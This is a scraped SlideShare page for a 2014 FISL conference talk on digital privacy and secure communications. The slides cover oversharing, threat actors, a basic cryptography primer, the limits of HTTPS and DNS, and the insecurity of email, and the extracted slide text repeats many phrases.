NSA-proof communicationsNSA-proof communications
(mostly)(mostly)
Jan SeidlJan Seidl
$ whoami$ whoami
Full Name:Full Name: Jan SeidlJan Seidl
Origin:Origin: Rio de Janeiro, RJ – BrazilRio de Janeiro, RJ – Br...
$ agenda$ agenda
0x0 Quick summary on privacy0x0 Quick summary on privacy
0x1 Who, why and how can you be spied on0x1 Who,...
Quick summary on privacyQuick summary on privacy
https://xkcd.com/1269/
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Why privacy matters?Why privacy matters?
YouYou do n...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Are we more public than before?Are we more public th...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Q: Do you stop a random stranger on the street and t...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Q: Would you easily engage conversation with someone...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Q: Do you think agencies, criminals and spies can ea...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
PLEASEPLEASE STOPSTOP
sharingsharing everythingevery...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Sharing is definitely not caringSharing is definitel...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
The Internet isThe Internet is FINOFINO –– First-In-...
Who/why/how can you be spied on?Who/why/how can you be spied on?
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Commercial competitorsCommercial competitors
Haters ...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
YES YOU DO!YES YOU DO!
You might have key intelligen...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
SOMETIMES IT'S NOT ABOUT YOU!SOMETIMES IT'S NOT ABOU...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Local machine compromiseLocal machine compromise
Com...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Where can your data be stolenWhere can your data be ...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Where can your data be stolenWhere can your data be ...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Do you still feel safe?Do you still feel safe?
Relax...
Cryptography primerCryptography primer
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
What the heck is encryption?What the heck is encrypt...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
What the heck is encryption?What the heck is encrypt...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
What does it provide?What does it provide?
Two out o...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Cryptography primerCryptography primer
Key-pairKey-p...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Cryptography primerCryptography primer
Key-pairKey-p...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
How HTTPS worksHow HTTPS works
Cryptography primerCr...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
How HTTPS worksHow HTTPS works
AsymmetricAsymmetricS...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Is cryptography gonna make me safe?Is cryptography g...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Is cryptography gonna make me safe?Is cryptography g...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Is cryptography gonna make me safe?Is cryptography g...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Is cryptography gonna make me safe?Is cryptography g...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Legal issuesLegal issues
Encryption is not allowed e...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Insecure communicationsInsecure communications
http:...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Which services are insecure?Which services are insec...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Whaa? But they don't use HTTPs?Whaa? But they don't ...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Should I break up with them?Should I break up with t...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
What about DNS servers?What about DNS servers?
Respo...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
What about DNS servers?What about DNS servers?
It is...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
The case of the famous Brazilian ISPThe case of the ...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
The case of the famous Brazilian ISPThe case of the ...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Keep that motto in mindKeep that motto in mind
Don't...
False sense of securityFalse sense of security
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
False sense of securityFalse sense of security
HTTPs...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
HTTPs is not gonna save youHTTPs is not gonna save y...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
HTTPs is not gonna save youHTTPs is not gonna save y...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Always keep in mind theAlways keep in mind the EvilE...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Always keep in mind theAlways keep in mind the EvilE...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Always keep in mind theAlways keep in mind the EvilE...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Always keep in mind theAlways keep in mind the EvilE...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Truth is, email is ooooooldTruth is, email is oooooo...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Second, email is also plaintextSecond, email is also...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
–– But hey, I've heard of this PGP thingy...But hey,...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
And there's also a GNU version!And there's also a GN...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Fact is: PGP is quite complicatedFact is: PGP is qui...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Fact is: PGP doesn't protects metadataFact is: PGP d...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Fact is: E-mail can't be fixedFact is: E-mail can't ...
Secure communicationsSecure communications
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
As Jack the Ripper would say, let's go by partsAs Ja...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Now that you know you can't trust the partiesNow tha...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Make sure your workstation is secureMake sure your w...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Roll your own local DNS serverRoll your own local DN...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Embrace the darknessEmbrace the darkness
Secure comm...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Embrace the darknessEmbrace the darkness
Secure comm...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Perfect-forward secrecyPerfect-forward secrecy
Secur...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Perfect-forward secrecyPerfect-forward secrecy
Secur...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Perfect-forward secrecyPerfect-forward secrecy
Secur...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Perfect-forward secrecyPerfect-forward secrecy
Secur...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Perfect-forward secrecyPerfect-forward secrecy
Secur...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Perfect-forward secrecyPerfect-forward secrecy
Secur...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Perfect-forward secrecyPerfect-forward secrecy
Secur...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Perfect-forward secrecyPerfect-forward secrecy
Secur...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Perfect-forward secrecyPerfect-forward secrecy
Secur...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Perfect-forward secrecyPerfect-forward secrecy
Secur...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Perfect-forward secrecyPerfect-forward secrecy
Secur...
Secure communication infrastructureSecure communication infrastructure
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
More load to process, more time to processMore load ...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
First, choose your preferred Linux flavorFirst, choo...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Let's start with some good full-disk encryptionLet's...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Then harden that system, baby!Then harden that syste...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
SSL EVERYWHERESSL EVERYWHERE
Secure communication in...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
LDAP for identity management &LDAP for identity mana...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Pretty default mail stackPretty default mail stack
S...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
We add auto PGP encryption to itWe add auto PGP encr...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
PGP supported softwarePGP supported software
Secure ...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
XMPP for chatXMPP for chat
Secure communication infr...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
XMPP for chatXMPP for chat
Secure communication infr...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Compliant XMPP+OTR clientsCompliant XMPP+OTR clients...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
XMPP+OTR clients + S/ZRTPXMPP+OTR clients + S/ZRTP
S...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Optional insecure feature: Web-mail InterfaceOptiona...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Optional insecure feature: Web-mail InterfaceOptiona...
The final productThe final product
Secure communication infrastructureSecure communication infrastructure
The remaining points of failureThe remaining points of failure
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Metadata is gold and is always leaking outMetadata i...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Metadata is gold and is always leaking outMetadata i...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Code may haveCode may have bugsbugs
The remaining po...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Code may haveCode may have featuresfeatures
The rema...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Code may haveCode may have featuresfeatures
The rema...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Code may haveCode may have featuresfeatures
The rema...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Agencies can be very persuasiveAgencies can be very ...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
–– So I'll never be completely safe?So I'll never be...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
–– Well, so I don't need to do security at allWell, ...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Closing upClosing up
We know security is not easyWe ...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Sometimes can be a painSometimes can be a pain
Closi...
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
But you gotta take care out there!But you gotta take...
That's all folks!That's all folks!
http://wroot.orghttp://wroot.org @jseidl@jseidl
jseidl@wroot.orgjseidl@wroot.orghttps:/...
NSA-Proof communications (mostly)
Upcoming SlideShare
Loading in...5
×

NSA-Proof communications (mostly)

2,176

Published on

A brief overview about digital privacy, why and how can you be spied on/have your data stolen, how to protect and how to have a safer approach to data sharing.

This presentation was given on May at FISL (Forum Internacional do Software Livre) 2014 at Porto Alegre, Brazil.

Presentation video (pt_BR): https://www.youtube.com/watch?v=gHuUnm0zckg

Published in: Technology, News & Politics
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
2,176
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
47
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

NSA-Proof communications (mostly)

  1. 1. NSA-proof communicationsNSA-proof communications (mostly)(mostly) Jan SeidlJan Seidl
  2. 2. $ whoami$ whoami Full Name:Full Name: Jan SeidlJan Seidl Origin:Origin: Rio de Janeiro, RJ – BrazilRio de Janeiro, RJ – Brazil Work:Work: ● CTO @ TI SafeCTO @ TI Safe ● OpenSource contributor for: PEV, LogstashOpenSource contributor for: PEV, Logstash ● Codes and snippets @ github.com/jseidlCodes and snippets @ github.com/jseidl Features:Features: ● UNIX Evangelist/Addict/Freak (but no fanboy!)UNIX Evangelist/Addict/Freak (but no fanboy!) ● Digital tools blacksmith / Python and C loverDigital tools blacksmith / Python and C lover ● Guitarist @ UmInEGuitarist @ UmInE ● Coffee dependentCoffee dependent ● Hates printers and social networksHates printers and social networks ● Proud DC Labs ResearcherProud DC Labs Researcher NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil
  3. 3. $ agenda$ agenda 0x0 Quick summary on privacy0x0 Quick summary on privacy 0x1 Who, why and how can you be spied on0x1 Who, why and how can you be spied on 0x2 Cryptography primer0x2 Cryptography primer 0x3 Insecure communications0x3 Insecure communications 0x4 False sense of security0x4 False sense of security 0x5 E-Mail never meant to be secure0x5 E-Mail never meant to be secure 0x6 Secure communications (mostly)0x6 Secure communications (mostly) 0x7 Creating a mostly secure communication infrastructure0x7 Creating a mostly secure communication infrastructure 0x8 The remaining points of failure0x8 The remaining points of failure 0x9 Closing up0x9 Closing up 0xA Questions?0xA Questions? NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil
  4. 4. Quick summary on privacyQuick summary on privacy https://xkcd.com/1269/
  5. 5. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Why privacy matters?Why privacy matters? YouYou do notdo not hold only info about yourselfhold only info about yourself You may hold key informationYou may hold key information about other people's lifesabout other people's lifes Less information about your target =Less information about your target = Harder to engageHarder to engage OPSECOPSEC http://en.wikipedia.org/wiki/Operations_securityhttp://en.wikipedia.org/wiki/Operations_security Quick summary on privacyQuick summary on privacy
  6. 6. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Are we more public than before?Are we more public than before? Most people know about physical world threatsMost people know about physical world threats Most peopleMost people don'tdon't know about digital threatsknow about digital threats And it's not their fault (mostly)And it's not their fault (mostly) Quick summary on privacyQuick summary on privacy
  7. 7. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Q: Do you stop a random stranger on the street and tell him:Q: Do you stop a random stranger on the street and tell him: - Your past locations (incl. Home, work, school, shops, parties)- Your past locations (incl. Home, work, school, shops, parties) - Your parents & kids' names, location, ages and pictures- Your parents & kids' names, location, ages and pictures - Your favorite interests (movies, books, sports etc)- Your favorite interests (movies, books, sports etc) - Confirm that you'll be at a given event- Confirm that you'll be at a given event Are we more public than before?Are we more public than before? Quick summary on privacyQuick summary on privacy
  8. 8. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Q: Would you easily engage conversation with someone thatQ: Would you easily engage conversation with someone that shared interest or experiences aboutshared interest or experiences about - Being at your past locations (incl. Home, work, school, shops, parties)- Being at your past locations (incl. Home, work, school, shops, parties) - Having parents & kids' with same names, ages and locations- Having parents & kids' with same names, ages and locations - Sharing your favorite interests (movies, books, sports etc)- Sharing your favorite interests (movies, books, sports etc) - Going to that given event- Going to that given event Are we more public than before?Are we more public than before? Quick summary on privacyQuick summary on privacy
  9. 9. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Q: Do you think agencies, criminals and spies can easilyQ: Do you think agencies, criminals and spies can easily sufficiently profile you using publicly available information?sufficiently profile you using publicly available information? Yes, there's also a cool term for it:Yes, there's also a cool term for it: OSINTOSINT http://en.wikipedia.org/wiki/Open-source_intelligencehttp://en.wikipedia.org/wiki/Open-source_intelligence Quick summary on privacyQuick summary on privacy Are we more public than before?Are we more public than before?
  10. 10. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil PLEASEPLEASE STOPSTOP sharingsharing everythingeverything on theon the INTERNETINTERNET!! Are we more public than before?Are we more public than before? Quick summary on privacyQuick summary on privacy
  11. 11. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Sharing is definitely not caringSharing is definitely not caring There's a huge chance you're anThere's a huge chance you're an overshareroversharer.. Yes. There is. Stop your internal dialog.Yes. There is. Stop your internal dialog. Are we more public than before?Are we more public than before? Quick summary on privacyQuick summary on privacy
  12. 12. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil The Internet isThe Internet is FINOFINO –– First-In-Never-OutFirst-In-Never-Out Even with court orders. There's always a copy somewhere.Even with court orders. There's always a copy somewhere. Eg: Google Caches, The Internet Archive, someone's hard diskEg: Google Caches, The Internet Archive, someone's hard disk The Internet never forgets!!1!The Internet never forgets!!1! Quick summary on privacyQuick summary on privacy
  13. 13. Who/why/how can you be spied on?Who/why/how can you be spied on?
  14. 14. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Commercial competitorsCommercial competitors Haters (are you from a race/religion someone doesn't likes?)Haters (are you from a race/religion someone doesn't likes?) AgenciesAgencies ““Data miners”Data miners” ““Marketing research”Marketing research” Criminals / PsychosCriminals / Psychos Who would spy on me?Who would spy on me? Who/why/how can you be spied on?Who/why/how can you be spied on?
  15. 15. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil YES YOU DO!YES YOU DO! You might have key intelligence files / information about your companyYou might have key intelligence files / information about your company You might don't know the value of themYou might don't know the value of them Why would someone spy on me?Why would someone spy on me? I have no valuable data!I have no valuable data! Who/why/how can you be spied on?Who/why/how can you be spied on?
  16. 16. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil SOMETIMES IT'S NOT ABOUT YOU!SOMETIMES IT'S NOT ABOUT YOU! You may know / be communicating with someone worth spying onYou may know / be communicating with someone worth spying on Your identity can be stolen to gain leverage on a targetYour identity can be stolen to gain leverage on a target Why would someone spy on me?Why would someone spy on me? I have no valuable data!I have no valuable data! Who/why/how can you be spied on?Who/why/how can you be spied on?
  17. 17. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Local machine compromiseLocal machine compromise Communications interception (local LAN, ISP, remote LAN)Communications interception (local LAN, ISP, remote LAN) Remote server compromiseRemote server compromise How would someone (digitally) spy on me?How would someone (digitally) spy on me? Who/why/how can you be spied on?Who/why/how can you be spied on?
  18. 18. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Where can your data be stolenWhere can your data be stolen Who/why/how can you be spied on?Who/why/how can you be spied on?
  19. 19. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Where can your data be stolenWhere can your data be stolen Here Here Here Here Here Here Here Here HereHere Who/why/how can you be spied on?Who/why/how can you be spied on?
  20. 20. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Do you still feel safe?Do you still feel safe? Relax, me neither.Relax, me neither. Who/why/how can you be spied on?Who/why/how can you be spied on?
  21. 21. Cryptography primerCryptography primer
  22. 22. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil What the heck is encryption?What the heck is encryption? Long story short: It makes plaintextLong story short: It makes plaintext unreadableunreadable, unless, unless keykey is providedis provided No! Perl is not ciphertext (I think...)No! Perl is not ciphertext (I think...) Cryptography primerCryptography primer
  23. 23. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil What the heck is encryption?What the heck is encryption? Sample dumbest example everSample dumbest example ever f(text, key)f(text, key) →→ 22··text ^ (key/3)text ^ (key/3) Cryptography primerCryptography primer
  24. 24. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil What does it provide?What does it provide? Two out of three of the CIA-Triad (no, not the agency!)Two out of three of the CIA-Triad (no, not the agency!) Confidentiality & IntegrityConfidentiality & Integrity Also: Identification, Authentication & Non-repudiationAlso: Identification, Authentication & Non-repudiation Cryptography primerCryptography primer
  25. 25. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Cryptography primerCryptography primer Key-pairKey-pair Diff. Keys for encr. / decr.Diff. Keys for encr. / decr. SlowerSlower Easier to maintainEasier to maintain Single KeySingle Key Same key for bothSame key for both FasterFaster Harder to maintainHarder to maintain Asymmetric vs SymmetricAsymmetric vs Symmetric
  26. 26. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Cryptography primerCryptography primer Key-pairKey-pair Diff. Keys for encr. / decr.Diff. Keys for encr. / decr. SlowerSlower Easier to maintainEasier to maintain Single KeySingle Key Same key for bothSame key for both FasterFaster Harder to maintainHarder to maintain Asymmetric vs SymmetricAsymmetric vs Symmetric MUST be kept privateMUST be kept private Can be publicCan be public
  27. 27. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil How HTTPS worksHow HTTPS works Cryptography primerCryptography primer
  28. 28. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil How HTTPS worksHow HTTPS works AsymmetricAsymmetricSymmetricSymmetric Cryptography primerCryptography primer
  29. 29. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Is cryptography gonna make me safe?Is cryptography gonna make me safe? Well... that depends...Well... that depends... Cryptography primerCryptography primer
  30. 30. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Is cryptography gonna make me safe?Is cryptography gonna make me safe? It supposed so... but then...It supposed so... but then... http://heartbleed.com/ Cryptography primerCryptography primer
  31. 31. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Is cryptography gonna make me safe?Is cryptography gonna make me safe? It supposed so... but then...It supposed so... but then... https://www.imperialviolet.org/2014/02/22/applebug.html Cryptography primerCryptography primer
  32. 32. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Is cryptography gonna make me safe?Is cryptography gonna make me safe? FACT:FACT: PeoplePeople make mistakes.make mistakes. PeoplePeople make code. Code getsmake code. Code gets bugsbugs.. Cryptography primerCryptography primer
  33. 33. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Legal issuesLegal issues Encryption is not allowed everywhere.Encryption is not allowed everywhere. Might be seen as sign of illegal activity!Might be seen as sign of illegal activity! So be advised!So be advised! http://en.wikipedia.org/wiki/Cryptography_lawhttp://en.wikipedia.org/wiki/Cryptography_law http://bit.ly/RbsYgohttp://bit.ly/RbsYgo Cryptography primerCryptography primer
  34. 34. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Insecure communicationsInsecure communications http://xkcd.com/257/
  35. 35. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Which services are insecure?Which services are insecure? ** ** **** Insecure communicationsInsecure communications
  36. 36. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Whaa? But they don't use HTTPs?Whaa? But they don't use HTTPs? HTTPs protects you fromHTTPs protects you from traffic eavesdroppingtraffic eavesdropping Traffic gets decipheredTraffic gets deciphered at company server before going to destinationat company server before going to destination Agencies mayAgencies may request your data to be forwardedrequest your data to be forwarded to them (court orders)to them (court orders) Agencies mayAgencies may request company private keysrequest company private keys for interception (same above)for interception (same above) Booya!Booya! Insecure communicationsInsecure communications
  37. 37. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Should I break up with them?Should I break up with them? You could. But you don't really need to.You could. But you don't really need to. Just don't say anything there that you wouldn't say to a random stranger.Just don't say anything there that you wouldn't say to a random stranger. If you need to exchange sensitive information, escalate to a secure medium.If you need to exchange sensitive information, escalate to a secure medium. Insecure communicationsInsecure communications
  38. 38. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil What about DNS servers?What about DNS servers? Responsible for connecting us to the hostResponsible for connecting us to the host we wantwe want.. Can be perverted to use the hostCan be perverted to use the host THEYTHEY want.want. Insecure communicationsInsecure communications
  39. 39. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil What about DNS servers?What about DNS servers? It is not that hard at all.It is not that hard at all. DNS is aDNS is a plaintextplaintext protocol.protocol. ewww...ewww... Insecure communicationsInsecure communications
  40. 40. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil The case of the famous Brazilian ISPThe case of the famous Brazilian ISP Google servers DNS lookup from a foreign (USA) connectionGoogle servers DNS lookup from a foreign (USA) connection Insecure communicationsInsecure communications (ping + dig using Google's DNS server)(ping + dig using Google's DNS server)
  41. 41. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil The case of the famous Brazilian ISPThe case of the famous Brazilian ISP Google servers DNS lookup from the ISP connectionGoogle servers DNS lookup from the ISP connection (ping + dig using Google's DNS server)(ping + dig using Google's DNS server) Insecure communicationsInsecure communications
  42. 42. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Keep that motto in mindKeep that motto in mind Don'tDon't thinkthink someone may be watching.someone may be watching. KNOWKNOW that someonethat someone ISIS watching!watching! Insecure communicationsInsecure communications
  43. 43. False sense of securityFalse sense of security
  44. 44. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil False sense of securityFalse sense of security HTTPs is not gonna save youHTTPs is not gonna save you Don't feel safe only because of that padlock iconDon't feel safe only because of that padlock icon Certificates/keys may be stolen/taken overCertificates/keys may be stolen/taken over Didn't I say that already?Didn't I say that already?
  45. 45. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil HTTPs is not gonna save youHTTPs is not gonna save you Private key custody = Ability to plaintext!Private key custody = Ability to plaintext! ssldump is an SSL/TLS network protocol analyzer. (…)ssldump is an SSL/TLS network protocol analyzer. (…) If providedIf provided with the appropriate keying material, it will also decrypt thewith the appropriate keying material, it will also decrypt the connections and display the application data trafficconnections and display the application data traffic.. http://www.rtfm.com/ssldump/Ssldump.htmlhttp://www.rtfm.com/ssldump/Ssldump.html False sense of securityFalse sense of security
  46. 46. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil HTTPs is not gonna save youHTTPs is not gonna save you Server Name Indication (SNI)Server Name Indication (SNI) is an extension to the TLS protocol[1]is an extension to the TLS protocol[1] that indicates what hostname the client is attempting to connect tothat indicates what hostname the client is attempting to connect to at the start of the handshaking processat the start of the handshaking process. This allows a server to. This allows a server to present multiple certificates on the same IP address and portpresent multiple certificates on the same IP address and port number and hence allows multiple secure (HTTPS) websites (or anynumber and hence allows multiple secure (HTTPS) websites (or any other Service over TLS) to be served off the same IP addressother Service over TLS) to be served off the same IP address without requiring all those sites to use the same certificate. Itwithout requiring all those sites to use the same certificate. It is the conceptual equivalent to HTTP/1.1 virtual hosting for HTTPS.is the conceptual equivalent to HTTP/1.1 virtual hosting for HTTPS. http://en.wikipedia.org/wiki/Server_Name_Indicationhttp://en.wikipedia.org/wiki/Server_Name_Indication False sense of securityFalse sense of security
  47. 47. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Always keep in mind theAlways keep in mind the EvilEvil ServerServer False sense of securityFalse sense of security
  48. 48. NSA-Proof Communications. SEIDL, Jan FISL 2014 – Porto Alegre, Brasil Always keep in mind theAlways keep in mind the EvilEvil ServerServer Server/network owners and admins might intercept your dataServer/network owners and admins might intercept your data Criminals may have foothold on target serverCriminals may have foothold on target server Generally data flows unencrypted on internal infrastructureGenerally data flows unencrypted on internal infrastructure Data can be found unencrypted on memory and session filesData can be found unencrypted on memory and session files False sense of securityFalse sense of security
